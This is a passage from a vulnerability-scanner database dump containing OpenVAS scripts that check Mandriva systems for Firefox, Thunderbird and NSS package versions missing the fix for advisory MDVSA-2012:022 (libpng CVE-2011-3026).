rpm:\"mozilla-thunderbird-be~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bg\", rpm:\"mozilla-thunderbird-bg~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bn_BD\", rpm:\"mozilla-thunderbird-bn_BD~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-br\", rpm:\"mozilla-thunderbird-br~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ca\", rpm:\"mozilla-thunderbird-ca~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-cs\", rpm:\"mozilla-thunderbird-cs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-da\", rpm:\"mozilla-thunderbird-da~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-de\", rpm:\"mozilla-thunderbird-de~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-el\", rpm:\"mozilla-thunderbird-el~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-en_GB\", rpm:\"mozilla-thunderbird-en_GB~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail\", rpm:\"mozilla-thunderbird-enigmail~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ar\", rpm:\"mozilla-thunderbird-enigmail-ar~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ca\", rpm:\"mozilla-thunderbird-enigmail-ca~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-cs\", rpm:\"mozilla-thunderbird-enigmail-cs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-de\", rpm:\"mozilla-thunderbird-enigmail-de~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-el\", rpm:\"mozilla-thunderbird-enigmail-el~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-es\", rpm:\"mozilla-thunderbird-enigmail-es~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fi\", rpm:\"mozilla-thunderbird-enigmail-fi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fr\", rpm:\"mozilla-thunderbird-enigmail-fr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-it\", rpm:\"mozilla-thunderbird-enigmail-it~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ja\", rpm:\"mozilla-thunderbird-enigmail-ja~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ko\", rpm:\"mozilla-thunderbird-enigmail-ko~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nb\", rpm:\"mozilla-thunderbird-enigmail-nb~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nl\", rpm:\"mozilla-thunderbird-enigmail-nl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pl\", rpm:\"mozilla-thunderbird-enigmail-pl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt\", rpm:\"mozilla-thunderbird-enigmail-pt~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt_BR\", rpm:\"mozilla-thunderbird-enigmail-pt_BR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ru\", rpm:\"mozilla-thunderbird-enigmail-ru~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sl\", rpm:\"mozilla-thunderbird-enigmail-sl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sv\", rpm:\"mozilla-thunderbird-enigmail-sv~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-tr\", rpm:\"mozilla-thunderbird-enigmail-tr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-vi\", rpm:\"mozilla-thunderbird-enigmail-vi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_CN\", rpm:\"mozilla-thunderbird-enigmail-zh_CN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_TW\", rpm:\"mozilla-thunderbird-enigmail-zh_TW~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_AR\", rpm:\"mozilla-thunderbird-es_AR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_ES\", rpm:\"mozilla-thunderbird-es_ES~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-et\", rpm:\"mozilla-thunderbird-et~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-eu\", rpm:\"mozilla-thunderbird-eu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fi\", rpm:\"mozilla-thunderbird-fi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fr\", rpm:\"mozilla-thunderbird-fr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fy\", rpm:\"mozilla-thunderbird-fy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ga\", rpm:\"mozilla-thunderbird-ga~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gd\", rpm:\"mozilla-thunderbird-gd~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gl\", rpm:\"mozilla-thunderbird-gl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-he\", rpm:\"mozilla-thunderbird-he~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-hu\", rpm:\"mozilla-thunderbird-hu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-id\", rpm:\"mozilla-thunderbird-id~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-is\", rpm:\"mozilla-thunderbird-is~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-it\", rpm:\"mozilla-thunderbird-it~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ja\", rpm:\"mozilla-thunderbird-ja~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ko\", rpm:\"mozilla-thunderbird-ko~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lightning\", rpm:\"mozilla-thunderbird-lightning~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lt\", rpm:\"mozilla-thunderbird-lt~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nb_NO\", rpm:\"mozilla-thunderbird-nb_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nl\", rpm:\"mozilla-thunderbird-nl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nn_NO\", rpm:\"mozilla-thunderbird-nn_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pl\", rpm:\"mozilla-thunderbird-pl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_BR\", rpm:\"mozilla-thunderbird-pt_BR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_PT\", rpm:\"mozilla-thunderbird-pt_PT~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ro\", rpm:\"mozilla-thunderbird-ro~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ru\", rpm:\"mozilla-thunderbird-ru~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-si\", rpm:\"mozilla-thunderbird-si~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sk\", rpm:\"mozilla-thunderbird-sk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sl\", rpm:\"mozilla-thunderbird-sl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sq\", rpm:\"mozilla-thunderbird-sq~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sv_SE\", rpm:\"mozilla-thunderbird-sv_SE~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ta_LK\", rpm:\"mozilla-thunderbird-ta_LK~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-tr\", rpm:\"mozilla-thunderbird-tr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-uk\", rpm:\"mozilla-thunderbird-uk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-vi\", rpm:\"mozilla-thunderbird-vi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_CN\", rpm:\"mozilla-thunderbird-zh_CN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_TW\", rpm:\"mozilla-thunderbird-zh_TW~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nsinstall\", rpm:\"nsinstall~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts-java\", rpm:\"rootcerts-java~20120218.00~1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-l10n\", rpm:\"mozilla-thunderbird-l10n~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-22T17:05:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3026"], "description": "The remote host is missing an update for the ", "modified": "2020-04-21T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:1361412562310803005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803005", "type": "openvas", "title": "Mandriva Update for mozilla MDVSA-2012:022 (mozilla)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mozilla MDVSA-2012:022 (mozilla)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:022\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.803005\");\n script_version(\"2020-04-21T06:28:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 06:28:23 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:31 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2011-3026\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:022\");\n script_name(\"Mandriva Update for mozilla MDVSA-2012:022 (mozilla)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mozilla'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2|2010\\.1)\");\n script_tag(name:\"affected\", value:\"mozilla on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Security issues were identified and fixed in mozilla firefox and\n thunderbird:\n\n An integer overflow in the libpng library can lead to a heap-buffer\n overflow when decompressing certain PNG images. This leads to a crash,\n which may be potentially exploitable (CVE-2011-3026).\n\n The mozilla firefox and thunderbird packages has been upgraded to the\n latest respective versions which is not affecte dby this security flaw.\n\n Additionally the rootcerts packages (root CA cerificates bundle)\n has been upgraded to the latest version as of 2012/02/18 and the NSS\n library has been rebuilt accordingly to pickup the changes.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ast\", rpm:\"firefox-ast~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_BD\", rpm:\"firefox-bn_BD~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_IN\", rpm:\"firefox-bn_IN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-br\", rpm:\"firefox-br~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bs\", rpm:\"firefox-bs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_ZA\", rpm:\"firefox-en_ZA~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_CL\", rpm:\"firefox-es_CL~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_MX\", rpm:\"firefox-es_MX~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fa\", rpm:\"firefox-fa~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gd\", 